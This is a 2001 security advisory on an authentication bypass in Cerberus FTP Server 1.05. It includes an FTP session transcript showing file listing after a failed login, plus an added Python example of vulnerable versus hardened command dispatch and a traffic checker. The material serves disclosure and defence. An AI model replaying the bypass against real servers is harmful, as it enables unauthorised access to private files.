Andrisk Security Advisory #2 - Cerberus FTP Server 1.05

Topic: Cerberus FTP Server 1.05
Announced: 2001-04-25
Affects: Cerberus FTP Server 1.05
OS : Win9x/NT

I. Problem Description
**********************
Cerberus FTP Server 1.05 is an FTP server for Windows 9x/NT. A bug 
allows a remote client to view any file on the server's computer.

II. Impact
**********
When a user tries to log in with a username that does not exist (or is wrong), the FTP server still allows:
1. The remote client to stay connected.
2. The remote client to view all files and browse all directories of the remote computer.

Example 1:
--------
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Name (IP:root): aaaaaaaaa
530 Unknown user
ftp: Login failed.
Remote system type is WindowsNT.
ftp> ls
200 Port command received
150 Opening data connection
d---rwxrwx  1 100 84 0 Apr 29 2001 !!
----rwxrwx  1 100 84 0 Nov 22 2000 AUTOEXEC.BAT
-r--rwxrwx  1 100 84 289 Dec 25 2000 boot.ini
-r--rwxrwx  1 100 84 36 Nov 22 2000 CONFIG.SYS
-r--rwxrwx  1 100 84 4717 Jan 31 2001 ffastun.ffa
-r--rwxrwx  1 100 84 2113536 Jan 31 2001 ffastun.ffl
-r--rwxrwx  1 100 84 417792 Jan 31 2001 ffastun.ffo
-r--rwxrwx  1 100 84 3620864 Jan 31 2001 ffastun0.ffx
dr--rwxrwx  1 100 84 0 Apr 30 2001 ftproot
-r--rwxrwx  1 100 84 0 Oct 01 2000 IO.SYS
dr--rwxrwx  1 100 84 0 Apr 30 2001 mirc
-r--rwxrwx  1 100 84 0 Oct 01 2000 MSDOS.SYS
-r--rwxrwx  1 100 84 26816 Oct 01 2000 NTDETECT.COM
-r--rwxrwx  1 100 84 156496 Oct 01 2000 ntldr
-r--rwxrwx  1 100 84 579 Oct 28 2000 os240905.bin
-r--rwxrwx  1 100 84 578 Nov 16 2000 os560179.bin
-r--rwxrwx  1 100 84 163811328 Apr 27 2001 pagefile.sys
dr--rwxrwx  1 100 84 0 Apr 29 2001 Program Files
dr--rwxrwx  1 100 84 0 Apr 30 2001 rc5
dr--rwxrwx  1 100 84 0 Apr 19 2001 RECYCLER
dr--rwxrwx  1 100 84 0 Apr 30 2001 TEMP
dr--rwxrwx  1 100 84 0 Apr 29 2001 WINNT
-r--rwxrwx  1 100 84 1375 Apr 29 2001 winzip.log
226 Transfer complete
ftp> 
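The session above shows the root cause: the server reports "530 Unknown user" but then serves LIST anyway, so the login result is announced but never enforced. The following is an added example written for this advisory, not Cerberus FTP Server code: a minimal FTP command dispatcher in the vulnerable shape (login state reported, not checked) beside a hardened version that refuses protected commands until a 230 login has succeeded, plus a transcript check a defender can run over captured control-channel traffic to flag the same pattern. The user database, the "> "/"< " transcript format and the sample transcript are constructed for the example; the PORT argument in it is a made-up address.

```python
# Added example, not part of the original advisory and not Cerberus FTP
# Server code. Demonstrates the defect class (commands dispatched without
# checking authentication state) next to the corrected dispatcher.
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed user database; the advisory names no real accounts.
USERS = {"alice": "s3cret"}

# Commands that must never be served before a successful login (230).
PROTECTED = {"LIST", "NLST", "CWD", "PWD", "RETR", "STOR", "DELE"}


@dataclass
class Session:
    user: Optional[str] = None
    authenticated: bool = False


def _dispatch(session: Session, verb: str, arg: str) -> str:
    """Command handlers shared by both dispatchers."""
    if verb == "USER":
        session.user = arg
        if arg in USERS:
            return "331 Password required"
        return "530 Unknown user"            # same reply as in Example 1
    if verb == "PASS":
        if session.user in USERS and USERS[session.user] == arg:
            session.authenticated = True
            return "230 User logged in"
        return "530 Login incorrect"
    if verb == "LIST":
        # In Example 1 this reply was followed by a listing of the drive root.
        return "150 Opening data connection\n226 Transfer complete"
    if verb == "QUIT":
        return "221 Goodbye"
    return "502 Command not implemented"


def handle_vulnerable(session: Session, line: str) -> str:
    """Vulnerable pattern: the login failure is reported but never enforced."""
    verb, _, arg = line.partition(" ")
    return _dispatch(session, verb.upper(), arg)


def handle_hardened(session: Session, line: str) -> str:
    """Hardened pattern: protected commands are refused until authenticated."""
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    if verb in PROTECTED and not session.authenticated:
        return "530 Please login with USER and PASS"
    return _dispatch(session, verb, arg)


def run(handler, commands: List[str]) -> List[str]:
    """Feed a command sequence through one dispatcher and collect replies."""
    session = Session()
    return [handler(session, c) for c in commands]


# Constructed control-channel transcript mirroring Example 1 ("> " = client,
# "< " = server). The PORT argument is a made-up address.
SAMPLE_TRANSCRIPT = """\
< 220 Welcome
> USER aaaaaaaaa
< 530 Unknown user
> PORT 10,0,0,5,4,1
< 200 Port command received
> LIST
< 150 Opening data connection
< 226 Transfer complete
"""


def unauthenticated_transfers(transcript: str) -> List[str]:
    """Return protected commands that got a positive (1xx/2xx) reply before
    any 230 login success. A non-empty result means the server served data
    to a client that never authenticated."""
    logged_in = False
    last_cmd = None
    findings: List[str] = []
    for raw in transcript.splitlines():
        if raw.startswith("> "):
            last_cmd = raw[2:].split(" ", 1)[0].upper()
        elif raw.startswith("< "):
            code = raw[2:5]
            if code == "230":
                logged_in = True
            elif code[0] in "12" and last_cmd in PROTECTED and not logged_in:
                if last_cmd not in findings:
                    findings.append(last_cmd)
    return findings


if __name__ == "__main__":
    print(run(handle_vulnerable, ["USER aaaaaaaaa", "LIST"]))
    print(run(handle_hardened, ["USER aaaaaaaaa", "LIST"]))
    print(unauthenticated_transfers(SAMPLE_TRANSCRIPT))
```

The fix is a single state check in front of the dispatcher rather than per-command logic: every command that touches the filesystem is gated on one `authenticated` flag that only a successful PASS can set. The transcript checker applies the same rule from the outside, which is useful for verifying a vendor fix or for spotting this behaviour in captured FTP traffic from other servers.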

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>

Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p